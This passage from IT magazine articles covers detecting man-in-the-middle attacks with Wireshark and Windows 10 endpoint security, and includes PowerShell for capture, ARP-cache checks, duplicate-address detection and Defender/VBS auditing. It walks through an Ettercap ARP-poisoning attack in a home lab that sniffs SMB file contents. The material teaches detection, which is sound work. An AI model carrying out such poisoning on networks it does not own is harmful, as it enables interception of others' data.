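                 '-b', "filesize:$FileSizeKB", '-b', "files:$RingFiles")
    if ($CaptureFilter) { $argList += @('-f', $CaptureFilter) }
    if ($NoPromiscuous)  { $argList += '-p' }
    return ,$argList
}

function Start-RingCapture {
    param(
        [Parameter(Mandatory)] [string] $Interface,
        [Parameter(Mandatory)] [string] $OutFile,
        [int] $RingFiles = 10,
        [int] $FileSizeKB = 102400,
        [string] $CaptureFilter = '',
        [string] $DumpcapPath = 'C:\Program Files\Wireshark\dumpcap.exe'   # assumption
    )
    if (-not (Test-Path -LiteralPath $DumpcapPath)) { throw "dumpcap not found at $DumpcapPath" }
    $argList = Get-DumpcapArgumentList -Interface $Interface -OutFile $OutFile `
        -RingFiles $RingFiles -FileSizeKB $FileSizeKB -CaptureFilter $CaptureFilter
    # Quote arguments containing spaces (interface names, filters); run detached so
    # the capture keeps going after this PowerShell window is closed.
    $quoted = $argList | ForEach-Object { if ($_ -match '\s') { '"' + $_ + '"' } else { $_ } }
    Start-Process -FilePath $DumpcapPath -ArgumentList $quoted -WindowStyle Hidden -PassThru
}

# Show the command line that would be run; the commented lines start and stop it.
Write-Host ('dumpcap ' + ((Get-DumpcapArgumentList -Interface 'Ethernet' `
    -OutFile 'C:\captures\mitm.pcapng' -CaptureFilter 'arp or port 445') -join ' '))
# $proc = Start-RingCapture -Interface 'Ethernet' -OutFile 'C:\captures\mitm.pcapng' -CaptureFilter 'arp or port 445'
# Stop-Process -Id $proc.Id    # ends the capture
```

The capture filter 'arp or port 445' keeps the ring small by recording only what the test below needs, ARP and SMB; omit -CaptureFilter to record everything that reaches the interface.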

Sniffing with Wireshark

To start sniffing with Wireshark, just click on the icon with the shark fin. Alternatively, double-click on the interface from which you want to record data. Use the Stop icon to stop the capture and the File menu item to save it, unless you have automated this action with the settings as explained above. In the upper window, Wireshark shows the incoming packets and, after selecting a packet, their content in the lower window (Figure 2). You can enter display filters in the upper section to ensure that Wireshark lists only the data that interests you.

Initial tests for detecting MITM attacks and understanding the corresponding processes can consist of monitoring how a new IP address is requested by DHCP, which is how clients communicate with the network and DHCP servers communicate with clients. The data can be displayed on-screen thanks to Wireshark. Sniffing other information that clients send to servers or to other endpoints basically works this way, as well.

Once you have started sniffing the traffic, you can renew the IP address on a Windows computer with:

ipconfig /release
ipconfig /renew

The data traffic triggered by this can then be captured. Clicking on the Protocol column lets you sort, even without saving files or setting filters. Selecting the DHCP protocol helps you find the individual messages between the client and DHCP server. Wireshark's bottom window shows the IP addresses and names of the computers involved. Other data packets can be read in a similar way.

Simulated Ettercap MITM Attack

To understand and ultimately defend yourself against an MITM attack, it can be helpful first to simulate an MITM attack yourself. Always keep in mind that this kind of experiment on a third-party network, including public WiFi, is likely to be punishable by law. On your own network, however, the security functions and barriers on the managed switches can easily be tested. Tools such as Wireshark in combination with Ettercap [2] help to flood the network with fake ARP data. The tool is available for Linux and is included in the Kali Linux distribution, as is Wireshark. On Ubuntu, install Ettercap with the commands:

sudo apt update
sudo apt install ettercap-common

The ettercap-common package provides the command-line tool; for the graphical interface used in the following steps, additionally install the ettercap-graphical package.

After starting Ettercap, you can start the sniffing process and display the list of local network hosts (Figure 3). Special settings are not necessary. Ettercap then displays the network devices it has found, which you can use for attacks. To start an MITM attack, click on a computer in the host list and select Add to Target 1.

For an effective test, create a share and a text file with arbitrary content on the computer. You can then track access to the share, see when the file is opened, and view its content in Wireshark. Check the ARP cache on the computer beforehand with arp -a and make a note of the original MAC address of the computer with the share (see the "Another Analysis Tool: XArp" box). In the attack, the MAC address stored for the original computer is replaced by the MAC address of another computer, in this case the one on which you launched Ettercap. Up to this point, Ettercap has not performed any actions but has only read data on the network, just as an attacker would do.

Next, select another computer that you want to sniff for the test and click Add to Target 2. The target definitions can also be seen at the bottom of the window. The Ettercap computer can now sniff the data between the two devices, and you can, in turn, analyze the operations with Wireshark.

In Ettercap's upper right menubar is an icon with a globe. If you click on it, you can choose from different MITM attacks. To test an attack, it is best to select ARP poisoning and confirm that you want to start. The attack is now active and can be observed with Wireshark. Ideally, you will want to launch Wireshark on the computer that is running Ettercap. This attack can also be done with Kali Linux, as mentioned before; both tools are integrated. At any time, you can stop ARP poisoning in Ettercap or define other targets. After stopping the attack, the selected target systems again have the correct MAC address assignments after a short time, because Ettercap re-ARPs the victims with the genuine addresses when it stops.

Another Analysis Tool: XArp

In addition to Wireshark, tools such as XArp help detect fake entries in ARP tables. A combination of different tools can be useful, which together perform a comprehensive analysis or stress test on your own security architecture. One way to detect this kind of attack is to keep a close eye on the ARP table on the victim's computer. XArp does just that, effectively helping to detect ARP spoofing. Unfortunately, XArp is no longer being maintained [3], although it might persist in distribution repositories, or someone might eventually revive the project.

Figure 3: Ettercap helps perform MITM attacks, which you can then analyze with Wireshark.
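The two cache checks the article relies on, one MAC address stored for several IP addresses (the "ARP Gateway" section above) and comparing the cache against the MAC addresses you noted before the test, can be automated on the Windows victim instead of reading arp -a by eye. The following PowerShell is an added example, not code from the article, from Ettercap, or from XArp: it implements both checks on objects shaped like the output of Get-NetNeighbor, the cmdlet behind the arp -a listing. The entries at the bottom are constructed to mimic the gateway, Target 1, and the Ettercap host, and are the only assumption.

```powershell
# Added example (not from the article): two checks on a Windows ARP cache.
# On a live host, feed in Get-NetNeighbor -AddressFamily IPv4; the sample
# entries at the bottom are constructed.

function ConvertTo-NormalMac {
    param([string] $Mac)
    # arp -a and Get-NetNeighbor use "aa-bb-cc-dd-ee-ff"; Linux 'ip n s' uses colons
    return $Mac.Trim().ToLower().Replace(':', '-')
}

function Test-IsUnicastMac {
    param([string] $Mac)
    $m = ConvertTo-NormalMac $Mac
    if ($m -in @('ff-ff-ff-ff-ff-ff', '00-00-00-00-00-00')) { return $false }
    # Multicast MACs (01-00-5e-..., 33-33-...) have the I/G bit of the first octet set.
    return (([Convert]::ToInt32($m.Substring(0, 2), 16) -band 1) -eq 0)
}

# Check 1: one MAC address stored for two or more IP addresses. During ARP
# poisoning the attacker's MAC is stored for the gateway and for the victim.
function Find-SharedMacEntries {
    param([Parameter(Mandatory)] [object[]] $Entries)   # IPAddress, LinkLayerAddress, State
    $Entries |
        Where-Object { ($_.State -in @('Reachable', 'Stale', 'Permanent', 'Delay', 'Probe')) -and
                       (Test-IsUnicastMac $_.LinkLayerAddress) } |
        Group-Object -Property { ConvertTo-NormalMac $_.LinkLayerAddress } |
        Where-Object { $_.Count -gt 1 } |
        ForEach-Object {
            [pscustomobject]@{ Mac = $_.Name; IPAddresses = @($_.Group.IPAddress | Sort-Object) }
        }
}

# Check 2: compare against a snapshot taken before the test ("make a note of
# the original MAC address"). Every IP whose MAC changed is reported.
function Compare-ArpBaseline {
    param(
        [Parameter(Mandatory)] [object[]] $Baseline,
        [Parameter(Mandatory)] [object[]] $Current
    )
    $before = @{}
    foreach ($e in $Baseline) { $before[$e.IPAddress] = ConvertTo-NormalMac $e.LinkLayerAddress }
    foreach ($e in $Current) {
        $mac = ConvertTo-NormalMac $e.LinkLayerAddress
        if ($before.ContainsKey($e.IPAddress) -and $before[$e.IPAddress] -ne $mac) {
            [pscustomobject]@{ IPAddress = $e.IPAddress; OldMac = $before[$e.IPAddress]; NewMac = $mac }
        }
    }
}

function New-ArpEntry {
    param([string] $Ip, [string] $Mac, [string] $State = 'Reachable')
    [pscustomobject]@{ IPAddress = $Ip; LinkLayerAddress = $Mac; State = $State }
}

# Constructed sample: gateway .1, Target 1 (.10, the host with the share),
# the Ettercap host .50 (MAC ending in ee), and the broadcast entry.
$baseline = @(
    (New-ArpEntry '192.168.1.1'   '00-11-22-33-44-01'),
    (New-ArpEntry '192.168.1.10'  '00-11-22-33-44-10'),
    (New-ArpEntry '192.168.1.50'  '00-11-22-33-44-ee' 'Stale'),
    (New-ArpEntry '192.168.1.255' 'ff-ff-ff-ff-ff-ff' 'Permanent')
)
# The same cache while ARP poisoning is active: the Ettercap MAC answers for everything.
$poisoned = @(
    (New-ArpEntry '192.168.1.1'   '00-11-22-33-44-ee'),
    (New-ArpEntry '192.168.1.10'  '00-11-22-33-44-ee'),
    (New-ArpEntry '192.168.1.50'  '00-11-22-33-44-ee' 'Stale'),
    (New-ArpEntry '192.168.1.255' 'ff-ff-ff-ff-ff-ff' 'Permanent')
)

Find-SharedMacEntries -Entries $poisoned | Format-List                      # one MAC, three IPs
Compare-ArpBaseline -Baseline $baseline -Current $poisoned | Format-Table    # .1 and .10 changed
# Live use: $now = Get-NetNeighbor -AddressFamily IPv4; Find-SharedMacEntries -Entries $now
```

A MAC address that legitimately owns several IP addresses (a router with secondary addresses, a VRRP or HSRP pair, a hypervisor host doing NAT for its guests) also shows up in the first check, so treat a hit as a lead to verify against the switch's MAC table or your baseline rather than as proof of an attack.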

Laughing Third Party

Launching Wireshark in parallel on the computer that you have defined as Target 2 is the easiest way to trace the attack. Open the share you created earlier and the file on the Target 2 computer, which is exactly what users would do when accessing data on the network. The two Wireshark instances capture the actions performed in the background.

If you again query the ARP cache on the Target 2 computer by typing arp -a, you will see that during an active MITM attack courtesy of Ettercap, the MAC address stored for Target 1 is identical to that of the Ettercap computer. The MITM computer has succeeded with its ARP attack and can impersonate another computer. The client you defined as Target 2 assumes that the Kali computer with Ettercap is the Target 1 computer with the active share, so the traffic can be recorded on the Kali computer, even though the data is supposed to run back and forth between Target 2 and Target 1 only and the Kali computer has no business being involved: a typical MITM case. Other computers will not notice this activity because the attack does not disturb the network. The entries you have made let the computer with Ettercap and its active Wireshark instance read data that is exchanged between Target 1 and Target 2. If the data is not encrypted, the Wireshark instance on the Ettercap/Kali client will help you extract the content of the data packets. You will find the corresponding captures on the Kali/Ettercap computer. Closing Ettercap on the MITM machine also ends ARP poisoning, and the attack is no longer visible.

Filters

Wireshark is as useful to an attacker reading the traffic diverted by an MITM attack as it is to the defender analyzing it. For this reason, it makes sense to take a close look at the tool's capabilities. One important feature is the display filters: If you enter arp as the filter in Wireshark, using the example of the attack described previously, you can focus on the ARP-related network traffic (Figure 4). If you then use the smb or smb2 filter, you will also see the SMB traffic between the clients. With the SMB filter, all exchanges between Target 1 and Target 2 show up, including the content of the text file created and opened for this test, as long as SMB encryption is not enabled on the share (SMB signing alone authenticates the packets but leaves the payload readable).

Wireshark also has the filters arp.duplicate-address-frame and arp.duplicate-address-detected, which tell Wireshark to display, from a saved or live capture, the ARP packets in which the same IP address is claimed by more than one MAC address. This is the mirror image of the cache check described earlier, where one MAC address turns up for several IP addresses. Precisely this information can be seen in the Info column, as Duplicate IP address detected for ... also in use by ..., together with the MAC address that previously used the address. If you find such packets on the network, you can assume that an attacker is trying to take over an IP address with a second MAC address, unless the explanation is a mundane one such as a host with a replaced network card or a DHCP lease handed to a different machine. If you click on such packets, the original MAC address of the respective systems can also be found during the analysis.

Conclusions

Wireshark is the ideal tool when it comes to capturing network traffic and can also be used to analyze MITM attacks. With its various filters, you can determine whether data on the network shows signs of such attacks. Together with software such as XArp and Ettercap, you can perform stress tests on your own network to check your internal security situation.

Info

[1] Wireshark: https://www.wireshark.org
[2] Ettercap: https://www.ettercap-project.org
[3] XArp: http://www.xarp.net

The Author

Thomas Joos is a freelance IT consultant and has been working in IT for more than 20 years. In addition, he writes hands-on books and papers on Windows and other Microsoft topics. You can meet him online at http://thomasjoos.spaces.live.com.

Figure 4: An MITM attack can be detected quite quickly by changing the display filters for ARP and SMB.
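The duplicate-address detection described in the Filters section above can be reproduced outside the Wireshark GUI, which is useful for scanning a large capture or a whole ring buffer of files. The PowerShell below is an added example and not part of the article: it reads ARP replies exported with tshark (the export command in the comment is an assumption about how you get the data out; the sample lines are constructed) and reports every IP address that two different MAC addresses answered for within a short time window.

```powershell
# Added example (not from the article): reproduce the check behind Wireshark's
# arp.duplicate-address-detected filter on ARP replies exported from a capture.
# Input lines are "epoch,mac,ip", the format this (assumed) tshark export yields:
#   tshark -r mitm.pcapng -Y "arp.opcode == 2" -T fields -E separator=, `
#          -e frame.time_epoch -e arp.src.hw_mac -e arp.src.proto_ipv4
# The sample lines at the bottom are constructed, not taken from a real capture.

function Find-ArpAddressConflicts {
    param(
        [Parameter(Mandatory)] [string[]] $Lines,
        [double] $WindowSeconds = 300    # claims further apart than this count as a lease change, not an attack
    )
    $claims    = @{}     # ip -> @{ mac -> time of the last reply from that mac }
    $conflicts = @()
    foreach ($line in $Lines) {
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        $t, $mac, $ip = $line.Trim().Split(',')
        $mac  = $mac.ToLower().Replace('-', ':')
        $time = [double] $t
        if (-not $claims.ContainsKey($ip)) { $claims[$ip] = @{} }
        foreach ($otherMac in @($claims[$ip].Keys)) {
            if ($otherMac -ne $mac -and ($time - $claims[$ip][$otherMac]) -le $WindowSeconds) {
                $conflicts += [pscustomobject]@{
                    IPAddress    = $ip
                    FirstMac     = $otherMac    # "also in use by" in Wireshark's Info column
                    SecondMac    = $mac         # the later claimant
                    SecondsApart = [math]::Round($time - $claims[$ip][$otherMac], 3)
                }
            }
        }
        $claims[$ip][$mac] = $time
    }
    return ,$conflicts
}

$sample = @(
    '1650000000.10,00:11:22:33:44:01,192.168.1.1',    # real gateway
    '1650000001.20,00:11:22:33:44:10,192.168.1.10',   # Target 1
    '1650000030.00,00:11:22:33:44:ee,192.168.1.1',    # Ettercap claims the gateway
    '1650000030.05,00:11:22:33:44:ee,192.168.1.10',   # ...and Target 1
    '1650000040.00,00:11:22:33:44:ee,192.168.1.50',   # its own address: no conflict
    '1650000041.00,00:11:22:33:44:01,192.168.1.1'     # gateway still answering: reported again
)
Find-ArpAddressConflicts -Lines $sample | Format-Table
# Live use: Find-ArpAddressConflicts -Lines (Get-Content .\arp-replies.csv)
```

During active poisoning the genuine host keeps answering as well, so the same address is reported in both orders; the MAC that does not appear in the ARP notes you took before the test is the suspect. A DHCP lease moving to another machine triggers one report too, but hours rather than seconds after the previous claim, which is why the function takes a time window.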

SECURITY Win 10 Endpoint Security

Endpoint Security for Windows 10

Well-Tempered Computer

Windows 10, build 21H1, has numerous protection mechanisms out of the box. We look at the option for delaying updates, the components and features of Microsoft Defender, and recommendations for hardening the operating system. By Marc Grote

Microsoft introduced a number of new security features in Windows 10, but they are not available in all variants of the operating system. For example, Microsoft Defender Credential Guard is only available in Windows 10 Enterprise E3/E5 (Windows Defender Device Guard, now Microsoft Defender Application Control, started out the same way, although WDAC policies have been supported on all client editions since version 1903); Microsoft Defender for Endpoint (formerly Advanced Threat Protection) is only available with Windows 10 Enterprise E3/E5, Microsoft 365 E5 Security, and Microsoft 365 E5. Also not to be ignored is that Microsoft only allows the Enterprise version to use group policies that configure the Windows Store.

Windows Update for Business

The monthly patch day still causes excitement among many administrators, as does the question as to whether everything will continue to work as it did before the update. Microsoft has changed the update cycle for Windows 10. Apart from the monthly critical updates, the company releases optional updates at different times in the second half of the month. Therefore, you can concentrate on installing the critical updates and install the optional updates at a later point in time, once their compatibility with the IT infrastructure has been successfully checked.

Windows Update for Business [1], the update process for business customers, includes what are known as update rings, which you can use to specify the order in which you want to patch end devices and servers. These rings let you, for example, patch only unimportant computers or special test machines in an initial update wave. Update rings also allow systems to be patched as a function of how they interact. For example, a domain controller can be patched first, followed by an Exchange server that requires the Active Directory (AD) services to work properly.

Windows Update for Business also lets you define maintenance windows during which computers receive updates, so you can select the time windows when the service interruptions associated with the update installation, in the form of computer or service restarts, will have little or no effect on your operation. IT managers can use local settings on the client or group policy to delay updates.

Lead Image © Galina Peshkova, 123RF.com
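The deferral and maintenance-window settings described in the Windows Update for Business section above can be set locally on a client, either through the Local Group Policy Editor or, as in this added PowerShell example that is not part of the article, by writing the registry values behind those policies. The value names are the documented Windows Update for Business policy values; the chosen defaults (7 days for quality updates, 60 for feature updates, active hours 07:00 to 19:00) are assumptions. Run it in an elevated shell on a stand-alone client, because a domain GPO would overwrite the values at the next policy refresh.

```powershell
# Added example: Windows Update for Business deferrals and active hours on a
# single client, written to the policy registry path that the equivalent Group
# Policy settings use. Defaults are assumptions; run elevated.

$WuPolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'

function Get-UpdateDeferral {
    # Read back the effective policy; empty fields mean no policy is set.
    $p = Get-ItemProperty -Path $WuPolicyPath -ErrorAction SilentlyContinue
    [pscustomobject]@{
        QualityDeferralDays = $p.DeferQualityUpdatesPeriodInDays
        FeatureDeferralDays = $p.DeferFeatureUpdatesPeriodInDays
        ActiveHours         = $(if ($p.SetActiveHours -eq 1) {
                                  '{0:00}:00-{1:00}:00' -f $p.ActiveHoursStart, $p.ActiveHoursEnd
                              } else { 'not set' })
    }
}

function Set-UpdateDeferral {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [ValidateRange(0, 30)]  [int] $QualityDays = 7,    # monthly (security/critical) updates, max 30
        [ValidateRange(0, 365)] [int] $FeatureDays = 60,   # semiannual feature updates, max 365
        [ValidateRange(0, 23)]  [int] $ActiveStart = 7,    # no automatic restarts from 07:00
        [ValidateRange(0, 23)]  [int] $ActiveEnd   = 19    # ...until 19:00
    )
    # Windows accepts an active-hours span of at most 18 hours.
    if (((($ActiveEnd - $ActiveStart) + 24) % 24) -gt 18) { throw 'Active hours may span at most 18 hours.' }
    if ($PSCmdlet.ShouldProcess($WuPolicyPath, "defer quality $QualityDays d, feature $FeatureDays d")) {
        New-Item -Path $WuPolicyPath -Force | Out-Null
        $values = [ordered]@{
            DeferQualityUpdates             = 1
            DeferQualityUpdatesPeriodInDays = $QualityDays
            DeferFeatureUpdates             = 1
            DeferFeatureUpdatesPeriodInDays = $FeatureDays
            SetActiveHours                  = 1
            ActiveHoursStart                = $ActiveStart
            ActiveHoursEnd                  = $ActiveEnd
        }
        foreach ($name in $values.Keys) {
            New-ItemProperty -Path $WuPolicyPath -Name $name -Value $values[$name] -PropertyType DWord -Force | Out-Null
        }
    }
    Get-UpdateDeferral
}

# Usage: preview, apply, verify. A test ring might use -QualityDays 0, a
# production ring -QualityDays 7 -FeatureDays 90.
# Set-UpdateDeferral -QualityDays 7 -FeatureDays 90 -WhatIf
# Set-UpdateDeferral -QualityDays 7 -FeatureDays 90
```

The same values, set per organizational unit, are what the update rings of the text amount to: a short quality deferral for the test machines, a longer one for the production ring, and active hours that keep the forced restart out of the working day.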

Authentication Options

In addition to the classic username and password option to authenticate to the system, Windows 10 provides other options (Figure 1). In workgroup environments, for example, a picture password can be used. You choose a picture for logging in and define various gestures on it that are known only to you and use them for authentication. Microsoft equates picture passwords with the PIN entry method in terms of security.

Windows Hello [2] is a biometric logon feature that automatically signs the user into the operating system when a known face is detected. As an alternative to facial recognition, the eyes (iris) or fingers (fingerprint) can be scanned for identification. Microsoft decided on this additional authentication option because passwords have long since ceased to provide sufficient security if users do not implement all the requirements for their secure use. You need the right kind of device to run Windows Hello, such as an integrated infrared camera, iris scanner, or fingerprint reader. In AD environments, Windows Hello can be implemented with the help of group policies.

Microsoft Passport (since merged into Windows Hello for Business) is a multifactor authentication (MFA) system that uses a PIN or biometrics (provided by Windows Hello) in conjunction with asymmetric keys bound to the device for authentication: the PIN or biometric unlocks a private key that never leaves the device, and only the corresponding public key is registered with the identity provider. Users can use it to authenticate against a local AD, Azure Active Directory (AAD), or a non-Microsoft LDAP service.

Windows 10 clients can also join an AAD and use it as their exclusive authentication source. A client's membership in the AAD then enables single sign-on (SSO) to various services, such as Office 365 in the Microsoft cloud. In environments with an on-premises AD and AAD, a synchronization instance (Azure AD Connect) ensures that SSO is still guaranteed for on-premises and cloud resources.

Endpoint Protection

Microsoft Defender is an integral part of Windows 10 and helps protect the computer against malware in two ways:
• Real-time protection: Microsoft Defender blocks malware that tries to install or run on the PC and notifies the user. The user is also notified if apps try to change important settings.
• Various scanning options: Microsoft Defender automatically checks at regular intervals whether malware is installed on the PC. The scan can be started at a different time, if desired. Microsoft Defender automatically removes or quarantines all suspicious objects detected during a scan. Users and administrators can manually remove objects from the quarantine, or the objects located there are automatically deleted after a definable period of time.

The Microsoft Defender interface largely matches that of older Windows Defender versions. However, the configuration of Defender options is now done in the Windows 10 settings menus and not in the Defender application itself.

In Windows 10, Microsoft Defender has become a strategic product and has been extended with numerous features, which I will describe in more detail in the following sections of this article. The components include Defender Security Center, Defender for Endpoint, Defender Application Control, Defender Credential Guard, Defender Exploit Guard, and Defender SmartScreen.

Defender Security Center

In version 1703, Microsoft combined various Windows security functions in the Defender Security Center [3] and made them easily accessible in a central interface. The Defender Security Center combines the following functions:
• Defender features: virus and threat protection.
• Device performance and health: information about device drivers and Windows update states, as well as battery status on mobile devices.
• Firewall and network protection: Defender firewall state with advanced security.
• App & browser control: configuration of Defender SmartScreen for apps, files, and the Edge browser.
• Family options: controlled access to web pages, time control for applications, and allowed access to applications for children.

Defender for Endpoint

The Microsoft Defender for Endpoint (formerly Windows Defender Advanced Threat Protection) [4] service for Windows 10, as of version 1607, helps you detect attacks on a network and initiate appropriate countermeasures. Microsoft Defender for Endpoint combines Windows 10 protection measures and cloud technologies in a single tool.

Features include anomaly detection capabilities (registry, filesystem, and network access) and security analysis capabilities in the Microsoft cloud (Bing and SmartScreen reputation, Microsoft Malicious Software Removal Tool, and threat intelligence). Microsoft Defender for Endpoint also supports security features such as AppLocker or Device Guard. The configuration is handled by group policies, System Center Endpoint Configuration Manager, scripts, mobile device management (MDM) tools, or Microsoft Intune.

Whereas Microsoft Defender for Endpoint is a cloud-based service, Microsoft Advanced Threat Analytics (ATA) is a local service installed on servers in the IT infrastructure to detect suspicious activities on the network in real time. ATA comprises the ATA Gateway or ATA Lightweight Gateway, ATA Center, and other components, some of which are optional. The core functionality involves all domain controllers in the enterprise mirroring their network traffic to the ATA Gateway (or running the Lightweight Gateway directly on the domain controller). ATA records the data in a database, clearly displays the findings in the ATA Center, and points out threats and possible countermeasures.

Figure 1: Logon procedures are numerous and vary in usefulness depending on the end device.
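The two protection modes listed under Endpoint Protection above, real-time protection and scheduled scans with automatic quarantine clean-up, can be audited and set with the Defender PowerShell module that ships with Windows 10 (Get-MpComputerStatus, Get-/Set-MpPreference). The following is an added example, not code from the article or from Microsoft: Test-DefenderPosture returns findings as an object rather than only printing them, and Set-DefenderBaseline applies a simple baseline. The thresholds and baseline values are assumptions; run it in an elevated shell.

```powershell
# Added example: audit and set the Defender behaviour described above with the
# Defender module. Thresholds and baseline values are assumptions; run elevated.

function Test-DefenderPosture {
    param(
        [int] $MaxSignatureAgeDays   = 3,
        [int] $MaxDaysSinceQuickScan = 7
    )
    $status = Get-MpComputerStatus    # live state of the engine
    $pref   = Get-MpPreference        # configured behaviour
    $findings = @()
    if (-not $status.AntivirusEnabled)          { $findings += 'Antivirus engine is disabled' }
    if (-not $status.RealTimeProtectionEnabled) { $findings += 'Real-time protection is off' }
    if ($pref.DisableRealtimeMonitoring)        { $findings += 'Real-time monitoring disabled in preferences' }
    if ($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
        $findings += "Signatures are $($status.AntivirusSignatureAge) days old"
    }
    if ($pref.ScanScheduleDay -eq 8)            { $findings += 'Scheduled scan is set to Never (8)' }
    # 0 days means quarantined items are kept forever and need manual clean-up.
    if ($pref.QuarantinePurgeItemsAfterDelay -eq 0) { $findings += 'Quarantine is never purged automatically' }
    if (-not $status.QuickScanEndTime -or ((Get-Date) - $status.QuickScanEndTime).Days -gt $MaxDaysSinceQuickScan) {
        $findings += "No quick scan completed in the last $MaxDaysSinceQuickScan days"
    }
    [pscustomobject]@{
        LastQuickScan = $status.QuickScanEndTime
        LastFullScan  = $status.FullScanEndTime
        Findings      = $findings
        Compliant     = ($findings.Count -eq 0)
    }
}

function Set-DefenderBaseline {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [ValidateRange(1, 90)] [int] $QuarantineRetentionDays = 30,
        [ValidateSet('Everyday', 'Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday')]
        [string] $ScanDay = 'Sunday',
        [ValidateRange(0, 23)] [int] $ScanHour = 2
    )
    if ($PSCmdlet.ShouldProcess('Microsoft Defender', 'apply baseline preferences')) {
        Set-MpPreference -DisableRealtimeMonitoring $false
        Set-MpPreference -ScanParameters QuickScan -ScanScheduleDay $ScanDay -ScanScheduleTime (New-TimeSpan -Hours $ScanHour)
        Set-MpPreference -QuarantinePurgeItemsAfterDelay $QuarantineRetentionDays
    }
    Test-DefenderPosture
}

# Usage:
# Test-DefenderPosture                        # read-only audit
# Set-DefenderBaseline -WhatIf                # preview the changes
# Set-DefenderBaseline -QuarantineRetentionDays 30
```

On a managed client, group policy or Intune settings take precedence over Set-MpPreference, so a finding that reappears after the baseline was applied usually means a policy is overriding it rather than that the cmdlet failed.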

Figure 2: The Advanced Threat Analytics console quickly identifies security incidents in the directory service.

Defender Application Control

The technology behind Defender Application Control (WDAC) [5] is also intended to prevent malware from running on and thus infiltrating the system. The tool is primarily intended to protect against new and unknown malware and Advanced Persistent Threats (APTs). WDAC thus provides increased protection in Windows 10 because it prevents any untrusted or non-digitally-signed app from running, including portable apps that run off a USB stick without a local installation.

Administrators can specify the source from which apps are considered trusted. Both universal apps and Win32 apps can be protected with WDAC in this way. When an application is executed, WDAC checks its trustworthiness. An application is considered secure if it has a digital signature from a manufacturer the policy trusts or from the Windows Store, and organizations can define their own applications as secure, for example by publisher certificate, file hash, or path. Administrators use central policies to determine which apps are trusted and how WDAC should be configured in the enterprise. WDAC protects its own enforcement against tampering with hardware and virtualization technologies: when hypervisor-protected code integrity (HVCI) is enabled, the code integrity checks run in an isolated environment that the Hyper-V hypervisor shields from the rest of the operating system, even from the kernel. Because this isolation uses Hyper-V as its base, client systems need to meet all the requirements for enabling the Hyper-V role. Compared with other Microsoft technologies (e.g., AppLocker), WDAC plays to its strengths because it is not possible to infiltrate the check process itself; AppLocker, by contrast, relies on the Application Identity service running inside the very operating system it protects, so anyone who gains administrative or kernel-level control can interfere with it.

Defender Credential Guard

Defender Credential Guard [6] is one of the most important newer features in Windows 10. It also uses Hyper-V virtualization-based security features to isolate secrets such as passwords, password hashes, and Kerberos ticket-granting tickets and gives access only to privileged system processes. NTLM (NT LAN Manager) hashes and Kerberos tickets can then no longer be read out of the memory of the LSASS process, which takes away the usual basis of the well-known pass-the-hash and pass-the-ticket attacks (Figure 2); credentials captured elsewhere, for example on a host without Credential Guard, remain usable. Defender Credential Guard requires the use of Windows 10 Enterprise or Windows Server 2016 and has the following hardware requirements:
• Virtualization-based security (VBS): VBS requires a 64-bit CPU, enabled CPU virtualization extensions, extended page tables (second-level address translation), and a Windows hypervisor.
• Secure boot
• Trusted Platform Module (TPM) 2.0 (recommended)
• Unified Extensible Firmware Interface (UEFI) lock (recommended)
Defender Credential Guard is configured by group policies.
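Whether Credential Guard and the hypervisor-protected code integrity that WDAC builds on are actually running, and which of the hardware requirements listed above are missing, can be read from the Win32_DeviceGuard CIM class; enabling the policy alone does not prove the service came up after the reboot. The following PowerShell is an added example and not part of the article: the numeric codes are those documented for that class, the sample object at the bottom is constructed so the report function can be exercised on any machine, and the live prerequisite checks require an elevated shell on Windows.

```powershell
# Added example: read the VBS / Credential Guard / HVCI state from
# Win32_DeviceGuard and check the hardware prerequisites listed above.
# Codes are the documented ones for the class. The sample object at the end
# is constructed so Get-VbsReport can run on any machine.

function Get-VbsReport {
    param(
        [object] $DeviceGuard = (Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard)
    )
    $property = @{ 1 = 'Base VBS support'; 2 = 'Secure Boot'; 3 = 'DMA protection'
                   4 = 'Secure memory overwrite'; 5 = 'UEFI code read-only'
                   6 = 'SMM mitigations'; 7 = 'Mode-based execution control' }
    $service  = @{ 1 = 'Credential Guard'; 2 = 'HVCI (memory integrity)'
                   3 = 'System Guard Secure Launch'; 4 = 'SMM firmware measurement' }
    $vbs      = @{ 0 = 'not enabled'; 1 = 'enabled but not running'; 2 = 'running' }

    $available  = @($DeviceGuard.AvailableSecurityProperties | ForEach-Object { [int]$_ })
    $required   = @($DeviceGuard.RequiredSecurityProperties  | ForEach-Object { [int]$_ })
    $running    = @($DeviceGuard.SecurityServicesRunning     | ForEach-Object { [int]$_ })
    $configured = @($DeviceGuard.SecurityServicesConfigured  | ForEach-Object { [int]$_ })

    [pscustomobject]@{
        VbsStatus              = $vbs[[int]$DeviceGuard.VirtualizationBasedSecurityStatus]
        AvailableProperties    = @($available | ForEach-Object { $property[$_] })
        MissingRequired        = @($required | Where-Object { $_ -notin $available } | ForEach-Object { $property[$_] })
        ServicesConfigured     = @($configured | ForEach-Object { $service[$_] })
        ServicesRunning        = @($running | ForEach-Object { $service[$_] })
        CredentialGuardRunning = (1 -in $running)
        HvciRunning            = (2 -in $running)
        # CodeIntegrityPolicyEnforcementStatus: 0 = off, 1 = audit (violations only logged), 2 = enforced
        WdacPolicy             = @('off', 'audit', 'enforced')[[int]$DeviceGuard.CodeIntegrityPolicyEnforcementStatus]
    }
}

function Test-CredentialGuardPrerequisites {
    # Live checks for the hardware list above; needs an elevated shell on Windows.
    $tpm = Get-CimInstance -Namespace 'root\cimv2\Security\MicrosoftTpm' -ClassName Win32_Tpm -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Is64Bit           = [Environment]::Is64BitOperatingSystem
        SecureBootEnabled = ((Confirm-SecureBootUEFI -ErrorAction SilentlyContinue) -eq $true)
        Tpm20             = ($null -ne $tpm -and $tpm.SpecVersion -like '2.0*')
        HypervisorPresent = (Get-CimInstance -ClassName Win32_ComputerSystem).HypervisorPresent
    }
}

# Constructed sample: VBS running, HVCI on, Credential Guard configured but not
# yet running (typical right after enabling the policy, before the reboot), WDAC in audit mode.
$sample = [pscustomobject]@{
    VirtualizationBasedSecurityStatus    = 2
    AvailableSecurityProperties          = @(1, 2, 3, 5, 7)
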